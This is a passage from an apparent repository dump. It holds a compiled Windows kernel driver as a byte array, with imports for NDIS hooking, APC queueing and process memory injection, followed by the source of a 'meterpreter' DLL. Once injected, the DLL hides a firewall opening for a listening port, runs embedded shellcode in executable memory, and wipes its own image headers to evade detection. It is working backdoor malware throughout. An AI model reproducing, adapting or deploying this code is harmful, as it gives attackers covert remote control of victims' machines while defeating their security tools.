0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,\r\n0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,\r\n0x45,0xf8,0x03,0x48,0x38,0x89,0x4d,0xd4,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,\r\n0x89,0x55,0xd4,0x8b,0x45,0xf4,0x03,0x45,0xd4,0x89,0x45,0xf4,0xeb,0x45,0x8b,0x4d,\r\n0xf0,0x8b,0x51,0x0c,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,\r\n0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0x
e9,\r\n0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,0x45,0xf8,0x03,0x48,0x38,0x89,\r\n0x4d,0xd0,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,0x89,0x55,0xd0,0x8b,0x45,0xd0,\r\n0x89,0x45,0xf4,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xe9,0x0b,0xff,0xff,\r\n0xff,0x8b,0x55,0xf4,0x3b,0x15,0x04,0x2e,0x00,0x10,0x72,0x75,0x8b,0x45,0xfc,0x50,\r\n0x8b,0x4d,0xf4,0x51,0x68,0xd0,0x0a,0x00,0x10,0xe8,0x54,0xd8,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xfc,0x89,0x02,0x8b,0x4d,0x10,0x8b,0x55,0xf4,0x89,\r\n0x11,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a,0x18,0x89,\r\n0x45,0xf0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xd8,0x83,0xc1,\r\n0x01,0x89,0x4d,0xd8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xd8,0x73,0x1d,\r\n0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0xff,0xff,0xff,0xfd,0x8b,0x45,0xf0,0x89,\r\n0x50,0x24,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xeb,0xce,0xb0,0x01,0xeb,\r\n0x02,0x32,0xc0,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x20,0x83,0x3d,0x08,0x2e,0x00,0x10,0x00,0x74,0x05,0xe9,\r\n0xd7,0x00,0x00,0x00,0x83,0x7d,0x0c,0x00,0x0f,0x85,0xcd,0x00,0x00,0x00,0x8b,0x45,\r\n0x10,0x8b,0x08,0xc1,0xe9,0x08,0x83,0xe1,0x01,0x0f,0x84,0xbc,0x00,0x00,0x00,0xc6,\r\n0x45,0xff,0x00,0x8b,0x55,0x10,0x8b,0x42,0x04,0x89,0x45,0xf4,0x8b,0x4d,0x10,0x8b,\r\n0x51,0x0c,0x89,0x55,0xf8,0x8b,0x45,0xf8,0x50,0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,\r\n0x52,0x68,0x90,0x0b,0x00,0x10,0xe8,0x87,0xd7,0xff,0xff,0x83,0xc4,0x10,0xc7,0x45,\r\n0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf0,0x83,0xc0,0x01,0x89,0x45,0xf0,\r\n0x83,0x7d,0xf0,0x07,0x73,0x33,0x8b,0x4d,0xf0,0x8b,0x14,0x8d,0xa4,0x2d,0x00,0x10,\r\n0x52,0x8d,0x45,0xe8,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xe8,\r\n0x51,0x8b,0x55,0x08,0x52,0xe8,0x86,0xdf,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,0x74,\r\n0x06,0xc6,0x45,0xff,0x01,0xeb,0x02,0xeb,0xbe,0x0f,0xb6,0x4d,0xff,0x85,0xc9,0x74,\r\n0x3a,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0
x00,0x00,0x00,0x8d,\r\n0x55,0xe0,0x52,0x8d,0x45,0xe4,0x50,0x8b,0x4d,0xf4,0x51,0xe8,0x60,0xfd,0xff,0xff,\r\n0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x14,0x8b,0x45,0xf4,0x03,0x45,0xe4,0xa3,0x08,0x2e,\r\n0x00,0x10,0x8b,0x4d,0xf4,0x51,0xe8,0xc5,0xfc,0xff,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,\r\n0x00,0x00,0x00,0x00,0x40,0x55,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1e,0x59,0x00,0x00,0x90,0x02,0x00,0x00,0x30,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x70,0x59,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00,\r\n0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00,\r\n0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00,\r\n0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00,\r\n0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00,\r\n0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00,\r\n0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00,\r\n0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00,\r\n0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00,\r\n0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x3c,0x00,0x44,0x62,0x67,0x50,0x72,0x69,0x6e,0x74,0x00,0x00,0x5f,0x05,0x52,0x74,\r\n0x6c,0x49,0x6e,0x69,0x74,0x55,0x6e,0x69,0x63,0x6f,0x64,0x65,0x53,0x74,0x72,0x69,\r\n0x6e,0x67,0x00,0x00,0x80,0x07,0x6d,0x65,0x6d,0x73,0x65,0x74,0x00,0x00,0x2a,0x03,\r\n0x4b,0x65,0x53,0x65,0x74,0x45,0x76,0x65,0x6e,0x74,0x00,0x00,0x85,0x00,0x45,0x78,\r\n0x46,0x72,0x65,0x65,0x50,0x6f,0x6f,0x6c,0x57,0x69,0x74,0x68,0x54,0x61,0x67,0x00,\r\n0x41,0x04,0x4f,0x62,0x66,0x44,0x65,0x72,0x65,
0x66,0x65,0x72,0x65,0x6e,0x63,0x65,\r\n0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0xa6,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,\r\n0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,\r\n0x73,0x73,0x49,0x64,0x00,0x00,0xa8,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x42,0x79,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,\r\n0x00,0x00,0x25,0x05,0x52,0x74,0x6c,0x45,0x71,0x75,0x61,0x6c,0x55,0x6e,0x69,0x63,\r\n0x6f,0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0xd2,0x06,0x5a,0x77,0x46,0x72,\r\n0x65,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,\r\n0x7e,0x07,0x6d,0x65,0x6d,0x63,0x70,0x79,0x00,0x00,0x98,0x06,0x5a,0x77,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,\r\n0x6f,0x72,0x79,0x00,0x58,0x07,0x5f,0x65,0x78,0x63,0x65,0x70,0x74,0x5f,0x68,0x61,\r\n0x6e,0x64,0x6c,0x65,0x72,0x33,0x00,0x00,0xad,0x06,0x5a,0x77,0x43,0x6c,0x6f,0x73,\r\n0x65,0x00,0x42,0x03,0x4b,0x65,0x55,0x6e,0x73,0x74,0x61,0x63,0x6b,0x44,0x65,0x74,\r\n0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0xb7,0x02,0x4b,0x65,\r\n0x44,0x65,0x6c,0x61,0x79,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x48,0x03,0x4b,0x65,0x57,0x61,0x69,0x74,0x46,0x6f,\r\n0x72,0x53,0x69,0x6e,0x67,0x6c,0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xe8,0x02,\r\n0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,\r\n0x00,0x00,0xd5,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,\r\n0x41,0x70,0x63,0x00,0x39,0x03,0x4b,0x65,0x53,0x74,0x61,0x63,0x6b,0x41,0x74,0x74,\r\n0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0x05,0x07,0x5a,0x77,\r\n0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x34,0x04,0x4f,0x62,0x4f,0x70,0x65,0x6e,\r\n0x4f,0x62,0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x00,\r\n0xd9,0x02,0x4b,0x65,0x49,0x6e
,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x45,0x76,\r\n0x65,0x6e,0x74,0x00,0x54,0x05,0x52,0x74,0x6c,0x47,0x65,0x74,0x56,0x65,0x72,0x73,\r\n0x69,0x6f,0x6e,0x00,0x6a,0x00,0x45,0x78,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,\r\n0x50,0x6f,0x6f,0x6c,0x00,0x00,0x9b,0x03,0x4d,0x6d,0x4d,0x61,0x70,0x4c,0x6f,0x63,\r\n0x6b,0x65,0x64,0x50,0x61,0x67,0x65,0x73,0x53,0x70,0x65,0x63,0x69,0x66,0x79,0x43,\r\n0x61,0x63,0x68,0x65,0x00,0x00,0xef,0x04,0x52,0x74,0x6c,0x43,0x6f,0x6d,0x70,0x61,\r\n0x72,0x65,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,0x00,0x88,0x07,0x73,0x74,0x72,0x63,\r\n0x6d,0x70,0x00,0x00,0x84,0x07,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x69,0x04,\r\n0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x8a,0x07,0x73,0x74,0x72,0x6c,0x65,0x6e,0x00,0x00,\r\n0x89,0x07,0x73,0x74,0x72,0x63,0x70,0x79,0x00,0x00,0x31,0x03,0x4b,0x65,0x53,0x65,\r\n0x74,0x53,0x79,0x73,0x74,0x65,0x6d,0x41,0x66,0x66,0x69,0x6e,0x69,0x74,0x79,0x54,\r\n0x68,0x72,0x65,0x61,0x64,0x00,0xb0,0x04,0x50,0x73,0x52,0x65,0x6d,0x6f,0x76,0x65,\r\n0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,\r\n0x6f,0x75,0x74,0x69,0x6e,0x65,0x00,0x00,0xbf,0x04,0x50,0x73,0x53,0x65,0x74,0x4c,\r\n0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,0x6f,\r\n0x75,0x74,0x69,0x6e,0x65,0x00,0x12,0x07,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,\r\n0x79,0x73,0x74,0x65,0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,\r\n0x00,0x00,0x40,0x05,0x52,0x74,0x6c,0x46,0x72,0x65,0x65,0x55,0x6e,0x69,0x63,0x6f,\r\n0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0xdb,0x04,0x52,0x74,0x6c,0x41,\r\n0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x54,0x6f,0x55,0x6e,0x69,0x63,0x6f,\r\n0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0x5b,0x05,0x52,0x74,0x6c,0x49,\r\n0x6e,0x69,0x74,0x41,0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x6e,0x74,\r\n0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,0x00,0x00,0x80,0x01,0x4e,0x64,\r\n0x69,0x73,0x5
2,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,\r\n0x6f,0x6c,0x00,0x00,0x69,0x00,0x4e,0x64,0x69,0x73,0x44,0x65,0x72,0x65,0x67,0x69,\r\n0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x00,0x00,0xb8,0x00,\r\n0x4e,0x64,0x69,0x73,0x47,0x65,0x74,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x00,0x00,\r\n0x4e,0x44,0x49,0x53,0x2e,0x53,0x59,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0xa4,0x3e,0xa8,0x3e,0x00,0x10,0x00,0x00,\r\n0xf8,0x00,0x00,0x00,0x48,0x30,0x50,0x30,0x7b,0x30,0x82,0x30,0x89,0x30,0x90,0x30,\r\n0x97,0x30,0x9e,0x30,0xa5,0x30,0xac,0x30,0xb3,0x30,0xba,0x30,0xc1,0x30,0xc8,0x30,\r\n0xcf,0x30,0xd6,0x30,0xdd,0x30,0xe2,0x30,0xec,0x30,0x03,0x31,0x0d,0x31,0x1c,0x31,\r\n0x2d,0x31,0x46,0x31,0x55,0x31,0x60,0x31,0x66,0x31,0x8f,0x31,0xab,0x31,0x52,0x33,\r\n0x5a,0x33,0xb4,0x33,0xc5,0x33,0xcb,0x33,0xfa,0x33,0x63,0x34,0x96,0x34,0xb2,0x34,\r\n0xc4,0x34,0xdd,0x34,0xef,0x34,0x22,0x35,0x3e,0x35,0x6d,0x35,0x86,0x35,0x8b,0x35,\r\n0xd9,0x35,0xef,0x35,0xe6,0x36,0x0a,0x37,0x15,0x37,0x46,0x37,0x4b,0x37,0x8b,0x37,\r\n0xac,0x37,0xbe,0x37,0xd9,0x37,0x31,0x38,0x45,0x38,0x71,0x38,0x87,0x38,0x69,0x39,\r\n0x81,0x39,0x93,0x39,0xa6,0x39,0xc0,0x39,0xed,0x39,0xf3,0x39,0x04,0x3a,0x19,0x3a,\r\n0x36,0x3a,0x3d,0x3a,0x50,0x3a,0x6f,0x3a,0x88,0x3a,0x92,0x3a,0x9d,0x3a,0x0f,0x3b,\r\n0x18,0x3b,0x23,0x3b,0x8f,0x3b,0x98,0x3b,0xa3,0x3b,0xdc,0x3b,0xff,0x3b,0x09,0x3c,\r\n0x2a,0x3c,0x34,0x3c,0x4e,0x3c,0x7c,0x3c,0x88,0x3c,0x92,0x3c,0xb0,0x3c,0xba,0x3c,\r\n0xc5,0x3c,0xd7,0x3c,0xdd,0x3c,0xee,0x3c,0xf4,0x3c,0x06,0x3d,0x1b,0x3d,0x30,0x3d,\r\n0x36,0x3d,0x40,0x3d,0x4a,0x3d,0x54,0x3d,0x5e,0x3d,0x68,0x3d,0x72,0x3d,0x7c,0x3d,\r\n0x96,0x3d,0x9b,0x3d,0x17,0x3e,0x44,0x3e,0x8c,0x3e,0xcb,0x3e,0x0c,0x3f,0x6e,0x3f,\r\n0x9b,0x3f,0xd1,0x3f,0x00,0x20,0x00,0x00,0xf4,0x00,0x00,0x00,0x10,0x30,0x51,0x30,\r\n0xba,0x30,0x57,0x31,0x6c,0x31,0x78,0x31,0xbb,0x31,0xc5,0x31,0xe2,0x31,0x09,0x32,\r\n0x1a,0x32,0x21,0x33,0x26,0x33,0x33,0x33,0x45,0x33,0x4e,0x33,0x56,0x33,0x5d,0x33,\
r\n0x63,0x33,0xb7,0x34,0xc6,0x34,0x10,0x35,0x27,0x35,0x3d,0x35,0x52,0x35,0x65,0x35,\r\n0x70,0x35,0xb5,0x35,0xc2,0x35,0xda,0x35,0xec,0x35,0x05,0x36,0x16,0x36,0x55,0x36,\r\n0x5b,0x36,0x70,0x36,0x83,0x36,0x89,0x36,0xc8,0x36,0xd7,0x36,0x34,0x37,0x3d,0x37,\r\n0x51,0x37,0x58,0x37,0x5e,0x37,0x6f,0x37,0x7d,0x37,0x82,0x37,0x88,0x37,0x9a,0x37,\r\n0x30,0x3b,0x3e,0x3b,0x6a,0x3b,0x82,0x3b,0xb7,0x3b,0xd1,0x3b,0xe4,0x3b,0xea,0x3b,\r\n0xf0,0x3b,0xf6,0x3b,0xfc,0x3b,0x02,0x3c,0x08,0x3c,0x0e,0x3c,0x14,0x3c,0x1a,0x3c,\r\n0x20,0x3c,0x26,0x3c,0x2c,0x3c,0x32,0x3c,0x38,0x3c,0x3e,0x3c,0x44,0x3c,0x4a,0x3c,\r\n0x50,0x3c,0x56,0x3c,0x5c,0x3c,0x62,0x3c,0x68,0x3c,0x6e,0x3c,0x74,0x3c,0x7a,0x3c,\r\n0x80,0x3c,0x86,0x3c,0x8c,0x3c,0x92,0x3c,0x98,0x3c,0x9e,0x3c,0xa4,0x3c,0xaa,0x3c,\r\n0xb0,0x3c,0xb6,0x3c,0xbc,0x3c,0xc2,0x3c,0xc8,0x3c,0xce,0x3c,0xd4,0x3c,0xda,0x3c,\r\n0xe4,0x3c,0xe8,0x3c,0xf4,0x3c,0xf8,0x3c,0x08,0x3d,0xa4,0x3d,0xa8,0x3d,0xac,0x3d,\r\n0xb0,0x3d,0xb4,0x3d,0xb8,0x3d,0xbc,0x3d,0x97,0x3e,0xaa,0x3e,0xbf,0x3e,0xee,0x3e,\r\n0xfd,0x3e,0x18,0x3f,0xc2,0x3f,0x00,0x00,0x00,0x30,0x00,0x00,0x6c,0x00,0x00,0x00,\r\n0x2d,0x30,0xf8,0x30,0x60,0x31,0x6a,0x31,0x8d,0x31,0xd9,0x31,0xea,0x31,0x00,0x32,\r\n0x16,0x32,0x48,0x32,0x57,0x32,0x74,0x32,0x11,0x36,0x1b,0x36,0x20,0x36,0x2a,0x36,\r\n0x31,0x36,0x38,0x36,0x3f,0x36,0x46,0x36,0x4d,0x36,0x54,0x36,0x5b,0x36,0x62,0x36,\r\n0x69,0x36,0x70,0x36,0x92,0x36,0xa2,0x36,0xff,0x36,0x0f,0x37,0x2c,0x37,0x5d,0x37,\r\n0x6d,0x37,0xa0,0x37,0xd4,0x37,0xe7,0x37,0x17,0x38,0x3b,0x38,0x52,0x38,0x5e,0x38,\r\n0xae,0x38,0xb9,0x38,0xc4,0x38,0xe0,0x38,0xe6,0x38,0xf3,0x38,0x0a,0x39,0x1b,0x39,\r\n0x39,0x39,0x00,0x00,0x00,0x40,0x00,0x00,0x14,0x00,0x00,0x00,0x7e,0x3f,0x91,0x3f,\r\n0xa6,0x3f,0xb7,0x3f,0xd6,0x3f,0xf7,0x3f,0x00,0x50,0x00,0x00,0x58,0x00,0x00,0x00,\r\n0x2e,0x30,0x33,0x30,0x4f,0x30,0x5b,0x30,0x68,0x30,0x6e,0x30,0x78,0x30,0x89,0x30,\r\n0x92,0x30,0xa5,0x30,0xab,0x30,0xbe,0x30,0xc4,0x30,0xd9,0x30,0xe3,0x30,0xe9,0x30,\r\n0xfd,0x30,0x03,0x31,0x18,0x31,0x29,0x31,0x3f,0x31,0x49,0x31,0x63,
0x31,0x76,0x31,\r\n0x81,0x31,0x95,0x31,0xd5,0x31,0xe6,0x31,0xfb,0x31,0x0c,0x32,0x15,0x32,0xb4,0x32,\r\n0x76,0x33,0x85,0x33,0x08,0x34,0x52,0x34,0x7c,0x34,0x87,0x34,0xde,0x34,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\r\n};"
  },
  {
    "path": "src/meterpreter/dllmain.cpp",
    "content": "#include \"stdafx.h\"\r\n\r\n#include \"../meterpreter_config.h\"\r\n\r\n#pragma comment(linker,\"/ENTRY:DllMain\")\r\n#pragma comment(linker,\"/NODEFAULTLIB\")\r\n//--------------------------------------------------------------------------------------\r\nDWORD WINAPI ShellcodeThread(LPVOID lpParam)\r\n{\r\n    typedef DWORD (WINAPI * SHELLCODE)(void);       \r\n    SHELLCODE Shellcode = (SHELLCODE)lpParam;\r\n\r\n    // call shellcode\r\n    return Shellcode();        \r\n}\r\n//--------------------------------------------------------------------------------------\r\nDWORD WINAPI MainThread(LPVOID lpParam)\r\n{\r\n    DWORD dwExit = 0;\r\n\r\n    DbgMsg(\r\n        __FILE__, __LINE__, __FUNCTION__\"(): Thread %x:%x started\\n\", \r\n        GetCurrentProcessId(), GetCurrentThreadId()\r\n    );\r\n\r\n    DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Adding firewall rule for TCP port %d...\\n\", LISTEN_PORT);\r\n\r\n    // add firewall rule to allow connections on meterpreter port\r\n    char szCommandLine[MAX_PATH];\r\n    wsprintf(szCommandLine, \"cmd.exe /C netsh firewall add portopening TCP %d \" FIREWALL_RULE_NAME, LISTEN_PORT);\r\n    UINT ExitCode = WinExec(szCommandLine, SW_HIDE);\r\n\r\n    DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Done (exit code: %d)\\n\", ExitCode);\r\n\r\n    // allocate memory for shellcode\r\n    PVOID Buff = VirtualAlloc(NULL, sizeof(PAYLOAD), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n    if (Buff)\r\n    {\r\n        DbgMsg(\r\n            __FILE__, __LINE__, __FUNCTION__\"(): Allocated %d bytes for payload at 0x%x\\n\", \r\n            sizeof(PAYLOAD), Buff\r\n        );\r\n\r\n        // copy shellcode\r\n        RtlCopyMemory(Buff, PAYLOAD, sizeof(PAYLOAD));\r\n\r\n        // run payload in separate thread\r\n        HANDLE hThread = CreateThread(NULL, 0, ShellcodeThread, Buff, 0, NULL);\r\n        if (hThread)\r\n        {\r\n            WaitForSingleObject(hThread, INFINITE);\r\n            
CloseHandle(hThread);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"CreateThread() ERROR %d\\n\", GetLastError());\r\n        }\r\n\r\n        VirtualFree(Buff, 0, MEM_RELEASE);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"VirtualAlloc() ERROR %d\\n\", GetLastError());\r\n    }\r\n\r\n    // delete firewall rule\r\n    DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Deleting firewall rule...\\n\");\r\n    ExitCode = WinExec(\"cmd.exe /C netsh advfirewall firewall delete rule name=\" FIREWALL_RULE_NAME, SW_HIDE);\r\n    DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Done (exit code: %d)\\n\", ExitCode);\r\n\r\n    DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): EXIT\\n\");\r\n\r\n#ifdef _X86_\r\n\r\n    // free DLL image and exit current thread\r\n    __asm\r\n    {\r\n        push    dwExit /* argument for ExitThread() */\r\n        push    MEM_RELEASE\r\n        push    0\r\n        push    lpParam /* address to free */\r\n        push    dword ptr [ExitThread] /* ExitThread() as return address from VirtualFree() */\r\n        mov     eax, dword ptr [VirtualFree]\r\n        jmp     eax\r\n    }\r\n\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n\r\n    return dwExit;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid my_memset(void *mem, unsigned char val, size_t size)\r\n{\r\n    for (size_t i = 0; i < size; i++)\r\n    {\r\n        ((unsigned char *)mem)[i] = i;\r\n    }\r\n\r\n    for (size_t i = 0; i < size; i++)\r\n    {\r\n        ((unsigned char *)mem)[i] ^= i;\r\n        ((unsigned char *)mem)[i] += val;\r\n    }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOL APIENTRY DllMain(\r\n    HMODULE hModule,\r\n    DWORD  ul_reason_for_call,\r\n    LPVOID lpReserved)\r\n{\r\n    switch (ul_reason_for_call)\r\n    {\r\n    case DLL_PROCESS_ATTACH:\r\n        {\r\n 
           char szProcessPath[MAX_PATH], szProcessUser[MAX_PATH];\r\n            DWORD dwUserLen = MAX_PATH;\r\n\r\n            GetModuleFileName(GetModuleHandle(NULL), szProcessPath, MAX_PATH);\r\n            GetUserName(szProcessUser, &dwUserLen);\r\n\r\n            DbgMsg(\r\n                __FILE__, __LINE__, __FUNCTION__\"(): Injected into process \\\"%s\\\" (PID=%d), User = \\\"%s\\\"\\n\",\r\n                szProcessPath, GetCurrentProcessId(), szProcessUser\r\n            );\r\n\r\n            PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n                ((PUCHAR)hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);\r\n\r\n            DWORD dwOldProt = 0;\r\n            if (VirtualProtect(hModule, pHeaders->OptionalHeader.SizeOfHeaders, PAGE_READWRITE, &dwOldProt))\r\n            {\r\n                // erase image headers\r\n                my_memset(hModule, 0, pHeaders->OptionalHeader.SizeOfHeaders);\r\n            }\r\n\r\n            // run payload in separate thread\r\n            HANDLE hThread = CreateThread(NULL, 0, MainThread, (PVOID)hModule, 0, NULL);\r\n            if (hThread)\r\n            {\r\n                CloseHandle(hThread);\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"CreateThread() ERROR %d\\n\", GetLastError());\r\n            }\r\n\r\n            break;\r\n        }\r\n\r\n    case DLL_THREAD_ATTACH:\r\n    case DLL_THREAD_DETACH:\r\n    case DLL_PROCESS_DETACH:\r\n        {\r\n            break;\r\n        }\r\n    }\r\n\r\n    return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid Dummy(void)\r\n{\r\n    MessageBox(0, \"<OK> to exit...\", __FUNCTION__\"()\", MB_ICONINFORMATION);\r\n    ExitProcess(0);\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/meterpreter/meterpreter.cpp",
    "content": "// meterpreter.cpp : Defines the exported functions for the DLL application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n"
  },
  {
    "path": "src/meterpreter/meterpreter.def",
    "content": "EXPORTS\r\nDummy"
  },
  {
    "path": "src/meterpreter/meterpreter.vcproj",
    "content": "<?xml version=\"1.0\" encoding=\"windows-1251\"?>\r\n<VisualStudioProject\r\n\tProjectType=\"Visual 